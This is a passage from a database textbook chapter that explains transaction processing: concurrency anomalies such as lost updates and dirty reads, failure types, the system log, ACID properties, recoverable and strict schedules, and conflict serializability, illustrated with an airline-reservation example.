unit such as a whole disk block, or even a smaller unit such as an individual field (attribute) value of some record in the database. The transaction processing concepts we discuss are independent of the data item granularity (size) and apply to data items in general. Each data item has a unique name, but this name is not typically used by the programmer; rather, it is just a means to uniquely iden- tify each data item. For example, if the data item granularity is one disk block, then the disk block address can be used as the data item name. Using this simplified data- base model, the basic database access operations that a transaction can include are as follows: ■ read_item(X). Reads a database item named X into a program variable. To simplify our notation, we assume that the program variable is also named X. ■ write_item(X). Writes the value of program variable X into the database item named X. The basic unit of data transfer from disk to main memory is one block. Executing a read_item(X) command includes the following steps: 1. Find the address of the disk block that contains item X. 2. Copy that disk block into a buffer in main memory (if that disk block is not already in some main memory buffer). 3. Copy item X from the buffer to the program variable named X. Executing a write_item(X) command includes the following steps: 1. Find the address of the disk block that contains item X. 2. Copy that disk block into a buffer in main memory (if that disk block is not already in some main memory buffer). 3. Copy item X from the program variable named X into its correct location in the buffer. 4. Store the updated block from the buffer back to disk (either immediately or at some later point in time). It is step 4 that actually updates the database on disk. In some cases the buffer is not immediately stored to disk, in case additional changes are to be made to the buffer. Usually, the decision about when to store a modified disk block whose contents are in a main memory buffer is handled by the recovery manager of the DBMS in coop- eration with the underlying operating system. The DBMS will maintain in the database cache a number of data buffers in main memory. Each buffer typically holds the contents of one database disk block, which contains some of the database items being processed. When these buffers are all occupied, and additional database disk blocks must be copied into memory, some buffer replacement policy is used to 750 Introduction to Transaction Processing Concepts and Theory (a) read_item(X ); X := X – N; write_item(X ); read_item(Y ); Y := Y + N; write_item(Y ); (b) read_item(X ); X := X + M; write_item(X ); T1 T2 Figure 2 Two sample transac- tions. (a) Transaction T1. (b) Transaction T2. choose which of the current buffers is to be replaced. If the chosen buffer has been modified, it must be written back to disk before it is reused.1 A transaction includes read_item and write_item operations to access and update the database. Figure 2 shows examples of two very simple transactions. The read-set of a transaction is the set of all items that the transaction reads, and the write-set is the set of all items that the transaction writes. For example, the read-set of T1 in Figure 2 is {X, Y} and its write-set is also {X, Y}. Concurrency control and recovery mechanisms are mainly concerned with the database commands in a transaction. Transactions submitted by the various users may execute concurrently and may access and update the same database items. If this concurrent execution is uncontrolled, it may lead to problems, such as an incon- sistent database. In the next section we informally introduce some of the problems that may occur. 1.3 Why Concurrency Control Is Needed Several problems can occur when concurrent transactions execute in an uncon- trolled manner. We illustrate some of these problems by referring to a much simpli- fied airline reservations database in which a record is stored for each airline flight. Each record includes the number of reserved seats on that flight as a named (uniquely identifiable) data item, among other information. Figure 2(a) shows a transaction T1 that transfers N reservations from one flight whose number of reserved seats is stored in the database item named X to another flight whose number of reserved seats is stored in the database item named Y. Figure 2(b) shows a simpler transac- tion T2 that just reserves M seats on the first flight (X) referenced in transaction T1. 2 To simplify our example, we do not show additional portions of the transactions, such as checking whether a flight has enough seats available before reserving addi- tional seats. 1We will not discuss buffer replacement policies here because they are typically discussed in operating systems textbooks. 2A similar, more commonly used example assumes a bank database, with one transaction doing a trans- fer of funds from account X to account Y and the other transaction doing a deposit to account X. 751 Introduction to Transaction Processing Concepts and Theory When a database access program is written, it has the flight number, flight date, and the number of seats to be booked as parameters; hence, the same program can be used to execute many different transactions, each with a different flight number, date, and number of seats to be booked. For concurrency control purposes, a trans- action is a particular execution of a program on a specific date, flight, and number of seats. In Figure 2(a) and (b), the transactions T1 and T2 are specific executions of the programs that refer to the specific flights whose numbers of seats are stored in data items X and Y in the database. Next we discuss the types of problems we may encounter with these two simple transactions if they run concurrently. The Lost Update Problem. This problem occurs when two transactions that access the same database items have their operations interleaved in a way that makes the value of some database items incorrect. Suppose that transactions T1 and T2 are submitted at approximately the same time, and suppose that their operations are interleaved as shown in Figure 3(a); then the final value of item X is incorrect because T2 reads the value of X before T1 changes it in the database, and hence the updated value resulting from T1 is lost. For example, if X = 80 at the start (originally there were 80 reservations on the flight), N = 5 (T1 transfers 5 seat reservations from the flight corresponding to X to the flight corresponding to Y), and M = 4 (T2 reserves 4 seats on X), the final result should be X = 79. However, in the interleaving of operations shown in Figure 3(a), it is X = 84 because the update in T1 that removed the five seats from X was lost. The Temporary Update (or Dirty Read) Problem. This problem occurs when one transaction updates a database item and then the transaction fails for some rea- son (see Section 1.4). Meanwhile, the updated item is accessed (read) by another transaction before it is changed back to its original value. Figure 3(b) shows an example where T1 updates item X and then fails before completion, so the system must change X back to its original value. Before it can do so, however, transaction T2 reads the temporary value of X, which will not be recorded permanently in the data- base because of the failure of T1. The value of item X that is read by T2 is called dirty data because it has been created by a transaction that has not completed and com- mitted yet; hence, this problem is also known as the dirty read problem. The Incorrect Summary Problem. If one transaction is calculating an aggregate summary function on a number of database items while other transactions are updating some of these items, the aggregate function may calculate some values before they are updated and others after they are updated. For example, suppose that a transaction T3 is calculating the total number of reservations on all the flights; meanwhile, transaction T1 is executing. If the interleaving of operations shown in Figure 3(c) occurs, the result of T3 will be off by an amount N because T3 reads the value of X after N seats have been subtracted from it but reads the value of Y before those N seats have been added to it. 752 Introduction to Transaction Processing Concepts and Theory (a) read_item(X ); X := X – N; write_item(X ); read_item(Y ); read_item(X ); X := X + M; write_item(X ); Time Item X has an incorrect value because its update by T1 is lost (overwritten). Y := Y + N; write_item(Y ); (b) read_item(X ); X := X – N; write_item(X ); read_item(X ); X := X + M; write_item(X ); Time Transaction T1 fails and must change the value of X back to its old value; meanwhile T2 has read the temporary incorrect value of X. read_item(Y ); T1 T1 (c) read_item(X ); X := X – N; write_item(X ); read_item(Y ); Y := Y + N; write_item(Y ); read_item(X ); sum := sum + X; read_item(Y ); sum := sum + Y; T3 reads X after N is subtracted and reads Y before N is added; a wrong summary is the result (off by N ). T3 T2 sum := 0; read_item(A); sum := sum + A; T1 T2 Figure 3 Some problems that occur when concurrent execution is uncontrolled. (a) The lost update problem. (b) The temporary update problem. (c) The incorrect summary problem. 753 Introduction to Transaction Processing Concepts and Theory The Unrepeatable Read Problem. Another problem that may occur is called unrepeatable read, where a transaction T reads the same item twice and the item is changed by another transaction T� between the two reads. Hence, T receives different values for its two reads of the same item. This may occur, for example, if during an airline reservation transaction, a customer inquires about seat availability on several flights. When the customer decides on a particular flight, the transaction then reads the number of seats on that flight a second time before completing the reservation, and it may end up reading a different value for the item. 1.4 Why Recovery Is Needed Whenever a transaction is submitted to a DBMS for execution, the system is respon- sible for making sure that either all the operations in the transaction are completed successfully and their effect is recorded permanently in the database, or that the transaction does not have any effect on the database or any other transactions. In the first case, the transaction is said to be committed, whereas in the second case, the transaction is aborted. The DBMS must not permit some operations of a trans- action T to be applied to the database while other operations of T are not, because the whole transaction is a logical unit of database processing. If a transaction fails after executing some of its operations but before executing all of them, the opera- tions already executed must be undone and have no lasting effect. Types of Failures. Failures are generally classified as transaction, system, and media failures. There are several possible reasons for a transaction to fail in the mid- dle of execution: 1. A computer failure (system crash). A hardware, software, or network error occurs in the computer system during transaction execution. Hardware crashes are usually media failures—for example, main memory failure. 2. A transaction or system error. Some operation in the transaction may cause it to fail, such as integer overflow or division by zero. Transaction failure may also occur because of erroneous parameter values or because of a logical programming error.3 Additionally, the user may interrupt the transaction during its execution. 3. Local errors or exception conditions detected by the transaction. During transaction execution, certain conditions may occur that necessitate cancel- lation of the transaction. For example, data for the transaction may not be found. An exception condition,4 such as insufficient account balance in a banking database, may cause a transaction, such as a fund withdrawal, to be canceled. This exception could be programmed in the transaction itself, and in such a case would not be considered as a transaction failure. 3In general, a transaction should be thoroughly tested to ensure that it does not have any bugs (logical programming errors). 4Exception conditions, if programmed correctly, do not constitute transaction failures. 754 Introduction to Transaction Processing Concepts and Theory 4. Concurrency control enforcement. The concurrency control method may decide to abort a transaction because it violates serializability (see Section 5), or it may abort one or more transactions to resolve a state of deadlock among several transactions. Transactions aborted because of serializability violations or deadlocks are typically restarted automatically at a later time. 5. Disk failure. Some disk blocks may lose their data because of a read or write malfunction or because of a disk read/write head crash. This may happen during a read or a write operation of the transaction. 6. Physical problems and catastrophes. This refers to an endless list of prob- lems that includes power or air-conditioning failure, fire, theft, sabotage, overwriting disks or tapes by mistake, and mounting of a wrong tape by the operator. Failures of types 1, 2, 3, and 4 are more common than those of types 5 or 6. Whenever a failure of type 1 through 4 occurs, the system must keep sufficient information to quickly recover from the failure. Disk failure or other catastrophic failures of type 5 or 6 do not happen frequently; if they do occur, recovery is a major task. The concept of transaction is fundamental to many techniques for concurrency control and recovery from failures. 2 Transaction and System Concepts In this section we discuss additional concepts relevant to transaction processing. Section 2.1 describes the various states a transaction can be in, and discusses other operations needed in transaction processing. Section 2.2 discusses the system log, which keeps information about transactions and data items that will be needed for recovery. Section 2.3 describes the concept of commit points of transactions, and why they are important in transaction processing. 2.1 Transaction States and Additional Operations A transaction is an atomic unit of work that should either be completed in its entirety or not done at all. For recovery purposes, the system needs to keep track of when each transaction starts, terminates, and commits or aborts (see Section 2.3). Therefore, the recovery manager of the DBMS needs to keep track of the following operations: ■ BEGIN_TRANSACTION. This marks the beginning of transaction execution. ■ READ or WRITE. These specify read or write operations on the database items that are executed as part of a transaction. ■ END_TRANSACTION. This specifies that READ and WRITE transaction oper- ations have ended and marks the end of transaction execution. However, at this point it may be necessary to check whether the changes introduced by 755 Introduction to Transaction Processing Concepts and Theory Active Begin transaction End transaction Commit AbortAbort Read, Write Partially committed Failed Terminated Committed Figure 4 State transition diagram illustrating the states for transaction execution. the transaction can be permanently applied to the database (committed) or whether the transaction has to be aborted because it violates serializability (see Section 5) or for some other reason. ■ COMMIT_TRANSACTION. This signals a successful end of the transaction so that any changes (updates) executed by the transaction can be safely committed to the database and will not be undone. ■ ROLLBACK (or ABORT). This signals that the transaction has ended unsuc- cessfully, so that any changes or effects that the transaction may have applied to the database must be undone. Figure 4 shows a state transition diagram that illustrates how a transaction moves through its execution states. A transaction goes into an active state immediately after it starts execution, where it can execute its READ and WRITE operations. When the transaction ends, it moves to the partially committed state. At this point, some recovery protocols need to ensure that a system failure will not result in an inability to record the changes of the transaction permanently (usually by recording changes in the system log, discussed in the next section).5 Once this check is successful, the transaction is said to have reached its commit point and enters the committed state. Commit points are discussed in more detail in Section 2.3. When a transaction is committed, it has concluded its execution successfully and all its changes must be recorded permanently in the database, even if a system failure occurs. However, a transaction can go to the failed state if one of the checks fails or if the transaction is aborted during its active state. The transaction may then have to be rolled back to undo the effect of its WRITE operations on the database. The terminated state corresponds to the transaction leaving the system. The transaction information that is maintained in system tables while the transaction has been run- ning is removed when the transaction terminates. Failed or aborted transactions may be restarted later—either automatically or after being resubmitted by the user—as brand new transactions. 5Optimistic concurrency control also requires that certain checks are made at this point to ensure that the transaction did not interfere with other executing transactions. 756 Introduction to Transaction Processing Concepts and Theory 2.2 The System Log To be able to recover from failures that affect transactions, the system maintains a log6 to keep track of all transaction operations that affect the values of database items, as well as other transaction information that may be needed to permit recov- ery from failures. The log is a sequential, append-only file that is kept on disk, so it is not affected by any type of failure except for disk or catastrophic failure. Typically, one (or more) main memory buffers hold the last part of the log file, so that log entries are first added to the main memory buffer. When the log buffer is filled, or when certain other conditions occur, the log buffer is appended to the end of the log file on disk. In addition, the log file from disk is periodically backed up to archival storage (tape) to guard against catastrophic failures. The following are the types of entries—called log records—that are written to the log file and the corresponding action for each log record. In these entries, T refers to a unique transaction-id that is generated automatically by the system for each transaction and that is used to identify each transaction: 1. [start_transaction, T]. Indicates that transaction T has started execution. 2. [write_item, T, X, old_value, new_value]. Indicates that transaction T has changed the value of database item X from old_value to new_value. 3. [read_item, T, X]. Indicates that transaction T has read the value of database item X. 4. [commit, T]. Indicates that transaction T has completed successfully, and affirms that its effect can be committed (recorded permanently) to the data- base. 5. [abort, T]. Indicates that transaction T has been aborted. Protocols for recovery that avoid cascading rollbacks (see Section 4.2)—which include nearly all practical protocols—do not require that READ operations are writ- ten to the system log. However, if the log is also used for other purposes—such as auditing (keeping track of all database operations)—then such entries can be included. Additionally, some recovery protocols require simpler WRITE entries only include one of new_value and old_value instead of including both (see Section 4.2). Notice that we are assuming that all permanent changes to the database occur within transactions, so the notion of recovery from a transaction failure amounts to either undoing or redoing transaction operations individually from the log. If the system crashes, we can recover to a consistent database state by examining the log (and using techniques not detailed here). Because the log contains a record of every WRITE operation that changes the value of some database item, it is possible to undo the effect of these WRITE operations of a transaction T by tracing backward through the log and resetting all items changed by a WRITE operation of T to their old_values. Redo of an operation may also be necessary if a transaction has its updates recorded in the log but a failure occurs before the system can be sure that all 6The log has sometimes been called the DBMS journal. 757 Introduction to Transaction Processing Concepts and Theory these new_values have been written to the actual database on disk from the main memory buffers. 2.3 Commit Point of a Transaction A transaction T reaches its commit point when all its operations that access the database have been executed successfully and the effect of all the transaction opera- tions on the database have been recorded in the log. Beyond the commit point, the transaction is said to be committed, and its effect must be permanently recorded in the database. The transaction then writes a commit record [commit, T] into the log. If a system failure occurs, we can search back in the log for all transactions T that have written a [start_transaction, T] record into the log but have not written their [commit, T] record yet; these transactions may have to be rolled back to undo their effect on the database during the recovery process. Transactions that have written their commit record in the log must also have recorded all their WRITE operations in the log, so their effect on the database can be redone from the log records. Notice that the log file must be kept on disk. Updating a disk file involves copying the appropriate block of the file from disk to a buffer in main memory, updating the buffer in main memory, and copying the buffer to disk. It is common to keep one or more blocks of the log file in main memory buffers, called the log buffer, until they are filled with log entries and then to write them back to disk only once, rather than writing to disk every time a log entry is added. This saves the overhead of multiple disk writes of the same log file buffer. At the time of a system crash, only the log entries that have been written back to disk are considered in the recovery process because the contents of main memory may be lost. Hence, before a transaction reaches its commit point, any portion of the log that has not been written to the disk yet must now be written to the disk. This process is called force-writing the log buffer before committing a transaction. 3 Desirable Properties of Transactions Transactions should possess several properties, often called the ACID properties; they should be enforced by the concurrency control and recovery methods of the DBMS. The following are the ACID properties: ■ Atomicity. A transaction is an atomic unit of processing; it should either be performed in its entirety or not performed at all. ■ Consistency preservation. A transaction should be consistency preserving, meaning that if it is completely executed from beginning to end without interference from other transactions, it should take the database from one consistent state to another. ■ Isolation. A transaction should appear as though it is being executed in iso- lation from other transactions, even though many transactions are executing 758 Introduction to Transaction Processing Concepts and Theory concurrently. That is, the execution of a transaction should not be interfered with by any other transactions executing concurrently. ■ Durability or permanency. The changes applied to the database by a com- mitted transaction must persist in the database. These changes must not be lost because of any failure. The atomicity property requires that we execute a transaction to completion. It is the responsibility of the transaction recovery subsystem of a DBMS to ensure atomicity. If a transaction fails to complete for some reason, such as a system crash in the midst of transaction execution, the recovery technique must undo any effects of the transaction on the database. On the other hand, write operations of a committed transaction must be eventually written to disk. The preservation of consistency is generally considered to be the responsibility of the programmers who write the database programs or of the DBMS module that enforces integrity constraints. Recall that a database state is a collection of all the stored data items (values) in the database at a given point in time. A consistent state of the database satisfies the constraints specified in the schema as well as any other constraints on the database that should hold. A database program should be written in a way that guarantees that, if the database is in a consistent state before executing the transaction, it will be in a consistent state after the complete execution of the transaction, assuming that no interference with other transactions occurs. The isolation property is enforced by the concurrency control subsystem of the DBMS. If every transaction does not make its updates (write operations) visible to other transactions until it is committed, one form of isolation is enforced that solves the temporary update problem and eliminates cascading rollbacks but does not elimi- nate all other problems. There have been attempts to define the level of isolation of a transaction. A transaction is said to have level 0 (zero) isolation if it does not over- write the dirty reads of higher-level transactions. Level 1 (one) isolation has no lost updates, and level 2 isolation has no lost updates and no dirty reads. Finally, level 3 isolation (also called true isolation) has, in addition to level 2 properties, repeatable reads.7 And last, the durability property is the responsibility of the recovery subsystem of the DBMS. We will introduce how recovery protocols enforce durability and atomicity in the next section. 4 Characterizing Schedules Based on Recoverability When transactions are executing concurrently in an interleaved fashion, then the order of execution of operations from all the various transactions is known as a schedule (or history). In this section, first we define the concept of schedules, and 7The SQL syntax for isolation level discussed later in Section 6 is closely related to these levels. 759 Introduction to Transaction Processing Concepts and Theory then we characterize the types of schedules that facilitate recovery when failures occur. In Section 5, we characterize schedules in terms of the interference of partic- ipating transactions, leading to the concepts of serializability and serializable sched- ules. 4.1 Schedules (Histories) of Transactions A schedule (or history) S of n transactions T1, T2, ..., Tn is an ordering of the oper- ations of the transactions. Operations from different transactions can be interleaved in the schedule S. However, for each transaction Ti that participates in the schedule S, the operations of Ti in S must appear in the same order in which they occur in Ti. The order of operations in S is considered to be a total ordering, meaning that for any two operations in the schedule, one must occur before the other. It is possible theoretically to deal with schedules whose operations form partial orders (as we discuss later), but we will assume for now total ordering of the operations in a schedule. For the purpose of recovery and concurrency control, we are mainly interested in the read_item and write_item operations of the transactions, as well as the commit and abort operations. A shorthand notation for describing a schedule uses the symbols b, r, w, e, c, and a for the operations begin_transaction, read_item, write_item, end_transac- tion, commit, and abort, respectively, and appends as a subscript the transaction id (transaction number) to each operation in the schedule. In this notation, the data- base item X that is read or written follows the r and w operations in parentheses. In some schedules, we will only show the read and write operations, whereas in other schedules, we will show all the operations. For example, the schedule in Figure 3(a), which we shall call Sa, can be written as follows in this notation: Sa: r1(X); r2(X); w1(X); r1(Y); w2(X); w1(Y); Similarly, the schedule for Figure 3(b), which we call Sb, can be written as follows, if we assume that transaction T1 aborted after its read_item(Y) operation: Sb: r1(X); w1(X); r2(X); w2(X); r1(Y); a1; Two operations in a schedule are said to conflict if they satisfy all three of the fol- lowing conditions: (1) they belong to different transactions; (2) they access the same item X; and (3) at least one of the operations is a write_item(X). For example, in schedule Sa, the operations r1(X) and w2(X) conflict, as do the operations r2(X) and w1(X), and the operations w1(X) and w2(X). However, the operations r1(X) and r2(X) do not conflict, since they are both read operations; the operations w2(X) and w1(Y) do not conflict because they operate on distinct data items X and Y; and the operations r1(X) and w1(X) do not conflict because they belong to the same transaction. Intuitively, two operations are conflicting if changing their order can result in a dif- ferent outcome. For example, if we change the order of the two operations r1(X); w2(X) to w2(X); r1(X), then the value of X that is read by transaction T1 changes, because in the second order the value of X is changed by w2(X) before it is read by 760 Introduction to Transaction Processing Concepts and Theory r1(X), whereas in the first order the value is read before it is changed. This is called a read-write conflict. The other type is called a write-write conflict, and is illustrated by the case where we change the order of two operations such as w1(X); w2(X) to w2(X); w1(X). For a write-write conflict, the last value of X will differ because in one case it is written by T2 and in the other case by T1. Notice that two read operations are not conflicting because changing their order makes no difference in outcome. The rest of this section covers some theoretical definitions concerning schedules. A schedule S of n transactions T1, T2, ..., Tn is said to be a complete schedule if the following conditions hold: 1. The operations in S are exactly those operations in T1, T2, ..., Tn, including a commit or abort operation as the last operation for each transaction in the schedule. 2. For any pair of operations from the same transaction Ti, their relative order of appearance in S is the same as their order of appearance in Ti. 3. For any two conflicting operations, one of the two must occur before the other in the schedule.8 The preceding condition (3) allows for two nonconflicting operations to occur in the schedule without defining which occurs first, thus leading to the definition of a schedule as a partial order of the operations in the n transactions.9 However, a total order must be specified in the schedule for any pair of conflicting operations (con- dition 3) and for any pair of operations from the same transaction (condition 2). Condition 1 simply states that all operations in the transactions must appear in the complete schedule. Since every transaction has either committed or aborted, a com- plete schedule will not contain any active transactions at the end of the schedule. In general, it is difficult to encounter complete schedules in a transaction processing system because new transactions are continually being submitted to the system. Hence, it is useful to define the concept of the committed projection C(S) of a schedule S, which includes only the operations in S that belong to committed trans- actions—that is, transactions Ti whose commit operation ci is in S. 4.2 Characterizing Schedules Based on Recoverability For some schedules it is easy to recover from transaction and system failures, whereas for other schedules the recovery process can be quite involved. In some cases, it is even not possible to recover correctly after a failure. Hence, it is important to characterize the types of schedules for which recovery is possible, as well as those for which recovery is relatively simple. These characterizations do not actually pro- vide the recovery algorithm; they only attempt to theoretically characterize the dif- ferent types of schedules. 8Theoretically, it is not necessary to determine an order between pairs of nonconflicting operations. 9In practice, most schedules have a total order of operations. If parallel processing is employed, it is theo- retically possible to have schedules with partially ordered nonconflicting operations. 761 Introduction to Transaction Processing Concepts and Theory First, we would like to ensure that, once a transaction T is committed, it should never be necessary to roll back T. This ensures that the durability property of trans- actions is not violated (see Section 3). The schedules that theoretically meet this cri- terion are called recoverable schedules; those that do not are called nonrecoverable and hence should not be permitted by the DBMS. The definition of recoverable schedule is as follows: A schedule S is recoverable if no transaction T in S commits until all transactions T� that have written some item X that T reads have committed. A transaction T reads from transaction T� in a schedule S if some item X is first written by T� and later read by T. In addition, T� should not have been aborted before T reads item X, and there should be no transactions that write X after T� writes it and before T reads it (unless those transactions, if any, have aborted before T reads X). Some recoverable schedules may require a complex recovery process as we shall see, but if sufficient information is kept (in the log), a recovery algorithm can be devised for any recoverable schedule. The (partial) schedules Sa and Sb from the preceding section are both recoverable, since they satisfy the above definition. Consider the schedule Sa� given below, which is the same as schedule Sa except that two commit operations have been added to Sa: Sa�: r1(X); r2(X); w1(X); r1(Y); w2(X); c2; w1(Y); c1; Sa� is recoverable, even though it suffers from the lost update problem; this problem is handled by serializability theory (see Section 5). However, consider the two (par- tial) schedules Sc and Sd that follow: Sc: r1(X); w1(X); r2(X); r1(Y); w2(X); c2; a1; Sd: r1(X); w1(X); r2(X); r1(Y); w2(X); w1(Y); c1; c2; Se: r1(X); w1(X); r2(X); r1(Y); w2(X); w1(Y); a1; a2; Sc is not recoverable because T2 reads item X from T1, but T2 commits before T1 commits. The problem occurs if T1 aborts after the c2 operation in Sc, then the value of X that T2 read is no longer valid and T2 must be aborted after it is committed, leading to a schedule that is not recoverable. For the schedule to be recoverable, the c2 operation in Sc must be postponed until after T1 commits, as shown in Sd. If T1 aborts instead of committing, then T2 should also abort as shown in Se, because the value of X it read is no longer valid. In Se, aborting T2 is acceptable since it has not committed yet, which is not the case for the nonrecoverable schedule Sc. In a recoverable schedule, no committed transaction ever needs to be rolled back, and so the definition of committed transaction as durable is not violated. However, it is possible for a phenomenon known as cascading rollback (or cascading abort) to occur in some recoverable schedules, where an uncommitted transaction has to be rolled back because it read an item from a transaction that failed. This is illustrated in schedule Se, where transaction T2 has to be rolled back because it read item X from T1, and T1 then aborted. Because cascading rollback can be quite time-consuming—since numerous transac- tions can be rolled back—it is important to characterize the schedules where this 762 Introduction to Transaction Processing Concepts and Theory phenomenon is guaranteed not to occur. A schedule is said to be cascadeless, or to avoid cascading rollback, if every transaction in the schedule reads only items that were written by committed transactions. In this case, all items read will not be dis- carded, so no cascading rollback will occur. To satisfy this criterion, the r2(X) com- mand in schedules Sd and Se must be postponed until after T1 has committed (or aborted), thus delaying T2 but ensuring no cascading rollback if T1 aborts. Finally, there is a third, more restrictive type of schedule, called a strict schedule, in which transactions can neither read nor write an item X until the last transaction that wrote X has committed (or aborted). Strict schedules simplify the recovery process. In a strict schedule, the process of undoing a write_item(X) operation of an aborted transaction is simply to restore the before image (old_value or BFIM) of data item X. This simple procedure always works correctly for strict schedules, but it may not work for recoverable or cascadeless schedules. For example, consider schedule Sf : Sf : w1(X, 5); w2(X, 8); a1; Suppose that the value of X was originally 9, which is the before image stored in the system log along with the w1(X, 5) operation. If T1 aborts, as in Sf , the recovery pro- cedure that restores the before image of an aborted write operation will restore the value of X to 9, even though it has already been changed to 8 by transaction T2, thus leading to potentially incorrect results. Although schedule Sf is cascadeless, it is not a strict schedule, since it permits T2 to write item X even though the transaction T1 that last wrote X had not yet committed (or aborted). A strict schedule does not have this problem. It is important to note that any strict schedule is also cascadeless, and any cascade- less schedule is also recoverable. Suppose we have i transactions T1, T2, ..., Ti, and their number of operations are n1, n2, ..., ni, respectively. If we make a set of all pos- sible schedules of these transactions, we can divide the schedules into two disjoint subsets: recoverable and nonrecoverable. The cascadeless schedules will be a subset of the recoverable schedules, and the strict schedules will be a subset of the cascade- less schedules. Thus, all strict schedules are cascadeless, and all cascadeless schedules are recoverable. 5 Characterizing Schedules Based on Serializability In the previous section, we characterized schedules based on their recoverability properties. Now we characterize the types of schedules that are always considered to be correct when concurrent transactions are executing. Such schedules are known as serializable schedules. Suppose that two users—for example, two airline reservations agents—submit to the DBMS transactions T1 and T2 in Figure 2 at approximately the same time. If no interleaving of operations is permitted, there are only two pos- sible outcomes: 1. Execute all the operations of transaction T1 (in sequence) followed by all the operations of transaction T2 (in sequence). 763 (a) Schedule A Schedule B read_item(X ); X := X – N; write_item(X ); read_item(Y ); read_item(X ); X := X + M; write_item(X ); Time Y := Y + N; write_item(Y ); (b) read_item(X ); X := X + M; write_item(X ); Time read_item(X ); X := X – N; write_item(X ); read_item(Y ); Y := Y + N; write_item(Y ); (c) T1 T2 Schedule C Schedule D read_item(X ); X := X – N; write_item(X ); read_item(Y ); read_item(X ); X := X + M; write_item(X ); Time Y := Y + N; write_item(Y ); read_item(X ); X := X + M; write_item(X ); read_item(X ); X := X – N; write_item(X ); read_item(Y ); Y := Y + N; write_item(Y ); T1 T2 T1 T2 T1 T2 Time Introduction to Transaction Processing Concepts and Theory Figure 5 Examples of serial and nonserial schedules involving transactions T1 and T2. (a) Serial schedule A: T1 followed by T2. (b) Serial schedule B: T2 followed by T1. (c) Two nonserial schedules C and D with interleaving of operations. 2. Execute all the operations of transaction T2 (in sequence) followed by all the operations of transaction T1 (in sequence). These two schedules—called serial schedules—are shown in Figure 5(a) and (b), respectively. If interleaving of operations is allowed, there will be many possible orders in which the system can execute the individual operations of the transac- tions. Two possible schedules are shown in Figure 5(c). The concept of serializability of schedules is used to identify which schedules are correct when transaction executions have interleaving of their operations in the schedules. This section defines serializability and discusses how it may be used in practice. 764 Introduction to Transaction Processing Concepts and Theory 5.1 Serial, Nonserial, and Conflict-Serializable Schedules Schedules A and B in Figure 5(a) and (b) are called serial because the operations of each transaction are executed consecutively, without any interleaved operations from the other transaction. In a serial schedule, entire transactions are performed in serial order: T1 and then T2 in Figure 5(a), and T2 and then T1 in Figure 5(b). Schedules C and D in Figure 5(c) are called nonserial because each sequence inter- leaves operations from the two transactions. Formally, a schedule S is serial if, for every transaction T participating in the sched- ule, all the operations of T are executed consecutively in the schedule; otherwise, the schedule is called nonserial. Therefore, in a serial schedule, only one transaction at a time is active—the commit (or abort) of the active transaction initiates execution of the next transaction. No interleaving occurs in a serial schedule. One reasonable assumption we can make, if we consider the transactions to be independent, is that every serial schedule is considered correct. We can assume this because every transac- tion is assumed to be correct if executed on its own (according to the consistency preservation property of Section 3). Hence, it does not matter which transaction is executed first. As long as every transaction is executed from beginning to end in iso- lation from the operations of other transactions, we get a correct end result on the database. The problem with serial schedules is that they limit concurrency by prohibiting interleaving of operations. In a serial schedule, if a transaction waits for an I/O operation to complete, we cannot switch the CPU processor to another transaction, thus wasting valuable CPU processing time. Additionally, if some transaction T is quite long, the other transactions must wait for T to complete all its operations before starting. Hence, serial schedules are considered unacceptable in practice. However, if we can determine which other schedules are equivalent to a serial sched- ule, we can allow these schedules to occur. To illustrate our discussion, consider the schedules in Figure 5, and assume that the initial values of database items are X = 90 and Y = 90 and that N = 3 and M = 2. After executing transactions T1 and T2, we would expect the database values to be X = 89 and Y = 93, according to the meaning of the transactions. Sure enough, execut- ing either of the serial schedules A or B gives the correct results. Now consider the nonserial schedules C and D. Schedule C (which is the same as Figure 3(a)) gives the results X = 92 and Y = 93, in which the X value is erroneous, whereas schedule D gives the correct results. Schedule C gives an erroneous result because of the lost update problem discussed in Section 1.3; transaction T2 reads the value of X before it is changed by transaction T1, so only the effect of T2 on X is reflected in the database. The effect of T1 on X is lost, overwritten by T2, leading to the incorrect result for item X. However, some nonserial schedules give the correct expected result, such as schedule D. We would like to determine which of the nonserial schedules always give a correct result and which may give erroneous results. The concept used to characterize schedules in this manner is that of serializability of a schedule. 765 Introduction to Transaction Processing Concepts and Theory S1 read_item(X ); X := X + 10; write_item(X ); S2 read_item(X ); X := X * 1.1; write_item (X ); Figure 6 Two schedules that are result equivalent for the initial value of X = 100 but are not result equivalent in general. The definition of serializable schedule is as follows: A schedule S of n transactions is serializable if it is equivalent to some serial schedule of the same n transactions. We will define the concept of equivalence of schedules shortly. Notice that there are n! possible serial schedules of n transactions and many more possible nonserial sched- ules. We can form two disjoint groups of the nonserial schedules—those that are equivalent to one (or more) of the serial schedules and hence are serializable, and those that are not equivalent to any serial schedule and hence are not serializable. Saying that a nonserial schedule S is serializable is equivalent to saying that it is cor- rect, because it is equivalent to a serial schedule, which is considered correct. The remaining question is: When are two schedules considered equivalent? There are several ways to define schedule equivalence. The simplest but least satis- factory definition involves comparing the effects of the schedules on the database. Two schedules are called result equivalent if they produce the same final state of the database. However, two different schedules may accidentally produce the same final state. For example, in Figure 6, schedules S1 and S2 will produce the same final data- base state if they execute on a database with an initial value of X = 100; however, for other initial values of X, the schedules are not result equivalent. Additionally, these schedules execute different transactions, so they definitely should not be considered equivalent. Hence, result equivalence alone cannot be used to define equivalence of schedules. The safest and most general approach to defining schedule equivalence is not to make any assumptions about the types of operations included in the transac- tions. For two schedules to be equivalent, the operations applied to each data item affected by the schedules should be applied to that item in both schedules in the same order. Two definitions of equivalence of schedules are generally used: conflict equivalence and view equivalence. We discuss conflict equivalence next, which is the more commonly used definition. The definition of conflict equivalence of schedules is as follows: Two schedules are said to be conflict equivalent if the order of any two conflicting operations is the same in both schedules. Recall from Section 4.1 that two operations in a schedule are said to conflict if they belong to different transactions, access the same database item, and either both are write_item operations or one is a write_item and the other a read_item. If two conflicting operations are applied in different orders in two sched- ules, the effect can be different on the database or on the transactions in the sched- ule, and hence the schedules are not conflict equivalent. For example, as we discussed in Section 4.1, if a read and write operation occur in the order r1(X), w2(X) in schedule S1, and in the reverse order w2(X), r1(X) in schedule S2, the value read by r1(X) can be different in the two schedules. Similarly, if two write operations 766 Introduction to Transaction Processing Concepts and Theory occur in the order w1(X), w2(X) in S1, and in the reverse order w2(X), w1(X) in S2, the next r(X) operation in the two schedules will read potentially different values; or if these are the last operations writing item X in the schedules, the final value of item X in the database will be different. Using the notion of conflict equivalence, we define a schedule S to be conflict seri- alizable10 if it is (conflict) equivalent to some serial schedule S�. In such a case, we can reorder the nonconflicting operations in S until we form the equivalent serial schedule S�. According to this definition, schedule D in Figure 5(c) is equivalent to the serial schedule A in Figure 5(a). In both schedules, the read_item(X) of 